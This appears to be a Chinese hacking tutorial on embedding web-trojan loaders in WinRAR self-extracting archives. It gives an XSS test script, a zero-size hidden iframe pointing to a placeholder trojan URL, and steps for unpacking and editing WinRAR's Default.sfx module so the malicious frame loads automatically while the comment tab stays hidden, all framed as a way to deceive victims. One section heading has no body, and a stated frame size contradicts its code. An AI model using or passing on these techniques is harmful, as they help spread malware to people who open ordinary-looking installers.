一、WinRAR与木马结合的优点
大家都知道WinRAR软件可以制作EXE自解压文件,以方便没有安装WinRAR软件的用户。WinRAR制作的自解压文件非常常见,而且不少软件也开始采用它来制作安装程序。用WinRAR制作自解压文件时,还可以对自解压界面进行自定义美化,在自解压时显示任意的文件或图片。我们可以通过对WinRAR自解压文件界面的再定义,从而欺骗对方在解压前执行网页木马。
二、简单测试
这里我们先来测试一下,在文本输入区中,输入如下代码:
<script>alert('nethack')</script>
这段代码常常被用来检测跨站漏洞,如果存在漏洞的话,那么在网页中会弹出一个文字提示对话框。点击“确定”按钮,返回自解压对话框,再点击“确定”按钮,即可在压缩包文件路径下,生成一个同名的后缀为.exe的自解压文件。现在,我们来双击这个自解压文件,看看前面的跨站检测代码是否执行?自解压文件打开后,同时弹出了刚才设置的文字提示对话框,说明网页代码执行了。
由此可见,WinRAR的自解压文件界面存在着跨站挂马的漏洞,我们完全可以修改刚才的测试代码,让自解压文件在打开时显示任意的网页,当然也可以显示木马网页,从而实现利用WinRAR自解压文件挂网页木马的攻击目的!
三、自解压挂网页木马
现在,我们来制作一个具有挂马攻击性的WinRAR自解压文件。首先,准备一个网页木马,并将其上传到某个网站空间中去。这里假设网页木马链接地址为“http://www.XXX.com/01.htm”。然后制作一个自解压文件,方法与前面相同,但是在写入文本框中,我们需要输入如下代码:
<iframe width=0 height=0 src="http://www.XXX.com/01.htm"></iframe>
这段代码表示显示一个长宽都为0网页象素,也就是不可见的页面框架,显示的网页内容为指定的木马网页。确定后即可制作成功一个挂马攻击的WinRAR自解压文件了。但是这里为了便于抓图显示攻击效果,我们将挂马语句改为了:
<iframe width=800 height=800 src="http://www.baidu.com"></iframe>
表示显示一个长宽为300的页面框架,显示的网页内容为百度首页。双击打开我们加入了挂马代码的WinRAR自解压文件时,可以在自解压界面窗口中看到显示了百度网页。由此可见挂成功!只要将代码换为真实的挂马代码,那么在WinRAR自解压界面中,就会显示空白页面,同时隐藏的打开木马网页,根本察觉不到任何攻击的症状!
四、挂马自解压包的不足
五、木马保护更强悍
那么,如何才能让隐藏注释信息,让挂马攻击的自解压包文件更完美呢?其实,自解压文件的“注释”信息,来源于WinRAR中的“Deault.sfx”自解压模块。我们完全可以修改此模块,让自解压文件不显示“注释”信息。
在WinRAR安装目录下,可以找到模块文件“Deault.sfx”。在修改前,可用Peid查壳,发现文件加了UPX壳,用UPX Shell对其脱壳即可。
<iframe width=800 height=800 src="http://www.baidu.com"></iframe>
修改完毕后,关闭eXeScope,保存更新“Deault.sfx”文件。然后直接创建一个WinRAR自解压文件,无需在其中添加挂马代码了,此时创建和自解压文件中自动显示了挂马网页(如图11)。但是在文件属性中,却根本看不到“注释”选项页,这样就实现了隐藏“注释”信息。如果我们挂马框架长宽为0的话,在自解压界面中显示的是“单击安装按钮开始解压……”之类的默认信息,也不会出现前面的空白页。
这样,一个极度完美的WinRAR自解压木马便制作成功了!你能找出它与普通自解压文件有什么不同吗?
